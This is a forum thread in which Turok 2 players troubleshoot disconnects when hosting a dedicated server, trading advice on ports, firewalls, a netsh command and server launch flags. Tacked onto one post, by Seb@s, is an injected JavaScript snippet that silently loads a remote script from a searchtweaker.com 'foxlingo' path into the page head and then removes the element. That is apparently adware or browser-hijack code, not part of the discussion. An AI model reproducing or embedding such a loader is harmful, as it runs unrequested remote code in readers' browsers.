google traductor2

TUROK 2 links


geocounter

compteurs pour blog
visits

Netbreak when I host dedicated

View previous topic View next topic Go down

Netbreak when I host dedicated

Post by kBg*ReDe@mer on 9th November 2013, 17:40

Whats up everyone, I am able to successfully host a dedicated but after I or anyone else joins in after about 5 seconds myself and anyone else gets a "netbreak error". Does anyone know the cause of this? I have tried dmz but still does the same. Im thinking it is a conflict in windows 7. Could it be the echo thing? Hope someone can help would like to run dedicated again
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by vis on 9th November 2013, 19:59

hey, red, I will try to help, echo thing, hmmm, you have print and file sharing on so it is that thing, we, players can ping you... My, friend , Douson was having same problem, me too, before, we using w 7 too....You have port forwarding  section
in router? DMZ is not good solution cos security, port forwarding one range for dynamic ports and single ports are better solution.. your server is visible so it is not firewall problem... I can teal you ports and what to do if you have skype, search me: live:milkidi , and we can do something...
avatar
vis

Number of posts : 493
Age : 29
Localisation : Serbia
Registration date : 2012-05-12

http://steamcommunity.com/id/Korlikos/

Back to top Go down

Re: Netbreak when I host dedicated

Post by kBg*ReDe@mer on 9th November 2013, 20:19

I seem to be in game with no netbreak. Can anyone confirm they can play in the kBg* ReD's Rok server?
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by kBg*ReDe@mer on 9th November 2013, 21:33

I have 12000 - 13000 ports open on the ip address of the computer that is hosing, what ports need to be configed? so you also had this problem?
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by azface on 9th November 2013, 22:38

Hey Red, I saw you come into crazy's server today but then as soon as you came, you went. Thought you might be having net problems,(that's the way Oldbull's does sometimes), anyway I'm also in U.S. if that helps if you want to try to host. I'll try to log in now if your server is up.


Azza
avatar
azface

Number of posts : 140
Registration date : 2013-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by RoyalTS on 9th November 2013, 22:38

When you run the gm_win32.exe you could try to call it with -verbose parameter, this will print out more information in the gm_win32.exe window so you might be able to see what causes this problem.

do it either in the cmd window with calling "gm_win32.exe -verbose", or how the name of your gm_win32.exe is.

Or create a new .bat file (just write this gm_win32.exe -verbose in a text file with notepad and save it as run.bat in the folder where this exe is) and start the gm_win32.exe from that.

I hope this can help

If it can't be found this way, you could try to change the server port in the RT_System.txt (port_base=    12800)
avatar
RoyalTS

Number of posts : 24
Registration date : 2013-08-14

Back to top Go down

Re: Netbreak when I host dedicated

Post by vis on 10th November 2013, 01:18

Grrr. was planning to send you ss of my router setings, but can't here, public...well do next: open command promp and type: netsh int ipv4 set dynamicport udp start=12000 num=1001, so if you opened UDP port range from 12000-13000(make that UDP if not), you will force win 7  dynamic ports to start from there and players will use that ports on your pc. here for reading if you not understand,  http://support.microsoft.com/kb/929851... then you need more ports ofcorse cos [email=T@2]T2[/email] use TPC ports too: 12805, 12804, 12803, 12801 and 12800...
avatar
vis

Number of posts : 493
Age : 29
Localisation : Serbia
Registration date : 2012-05-12

http://steamcommunity.com/id/Korlikos/

Back to top Go down

Re: Netbreak when I host dedicated

Post by RoyalTS on 10th November 2013, 10:00

Maybe it's blocked somehow by the Windows built in firewall also...
avatar
RoyalTS

Number of posts : 24
Registration date : 2013-08-14

Back to top Go down

Re: Netbreak when I host dedicated

Post by kBg*ReDe@mer on 10th November 2013, 15:53

Vis I tried what you said and it did work but it made my internet on my computer 50X slower. I was able to host and join with no netbreak but my internet was so slow that gamespy was having trouble refreshing the servers. After a reboot everything was back to normal but got the netbreak again. I cant understand how a game from the 90's is so  hard to host lol. The windows firewall has everything related to this game able to go thru. I will try to turn off the firewall with the range of 12000 - 13000 ports open
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by vis on 10th November 2013, 16:17

Not give up, red : J! you coluld try other range, maybe your ips have something with that, but that is out of my view... So, try other range, then diferant serv base ( like royal said, try instead 12800 , 12700 or any other 12900 and so on...Test that speed issue with that...Maybe can help. Never haved similar problems, btw I was very heppy when get chance to host..was hard to find that dynamic port range controlling, specialy on win 2k3, where you need to do from registry and around...Well , good luck! I will inform you if something fall on mind hehehe..

ps. we need servers and dif mods... Greetings!
avatar
vis

Number of posts : 493
Age : 29
Localisation : Serbia
Registration date : 2012-05-12

http://steamcommunity.com/id/Korlikos/

Back to top Go down

Re: Netbreak when I host dedicated

Post by kBg*ReDe@mer on 10th November 2013, 18:04

if i set the server port to anything other than 12800 it keeps asking me if I started the Rtime server. 12800 is the only one i can set it too
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by kBg*ReDe@mer on 10th November 2013, 18:21

LOL if i turn off my windows firewall you get a connection break as  you try to connect, if i turn it on you get in the game for 5 secs then you get connection break. Im just about done trying, im wondering if integrated is the same way
avatar
kBg*ReDe@mer

Number of posts : 44
Age : 34
Localisation : USA
Registration date : 2010-05-12

Back to top Go down

Re: Netbreak when I host dedicated

Post by Birdskiller on 10th November 2013, 22:08

well i think it's related to ur modem settings : i can host with w7, only problem is my server is red (for me only) in gspy.

bout ur router, if there is an integrated firewall, maybe the security level is too high.
Still in ur router, allow ports range from 12000 to 13000, both UDP/TCP, but i think u already tested?

finally in w7 firewall, u might create a new rule to allow ping echo; but usually this solves only the 9999 pings, not a netbreak.

Birdskiller

Number of posts : 1277
Localisation : France
Registration date : 2009-05-14

Back to top Go down

Re: Netbreak when I host dedicated

Post by Seb@s on 11th November 2013, 00:18

I might upload some screenshots...but lamentably my screnshots never prove aaaannnnyyyyttttthhhhhiiinnnggggggg !!   Sad 

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
avatar
Seb@s

Number of posts : 500
Age : 36
Localisation : Uruguay
Registration date : 2009-05-15

http://turok-2.blogspot.com/

Back to top Go down

Re: Netbreak when I host dedicated

Post by RoyalTS on 12th November 2013, 17:52

kBg*ReDe@mer wrote:if i set the server port to anything other than 12800 it keeps asking me if I started the Rtime server. 12800 is the only one i can set it too
of course you have to change it also in the gm.cfg at ServerPort=
avatar
RoyalTS

Number of posts : 24
Registration date : 2013-08-14

Back to top Go down

Re: Netbreak when I host dedicated

Post by RoyalTS on 12th November 2013, 17:53

To achieve bigger bandwith you could try to run the gm_win32.exe with the -lan parameter  (gm_win32.exe -lan)
avatar
RoyalTS

Number of posts : 24
Registration date : 2013-08-14

Back to top Go down

Re: Netbreak when I host dedicated

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum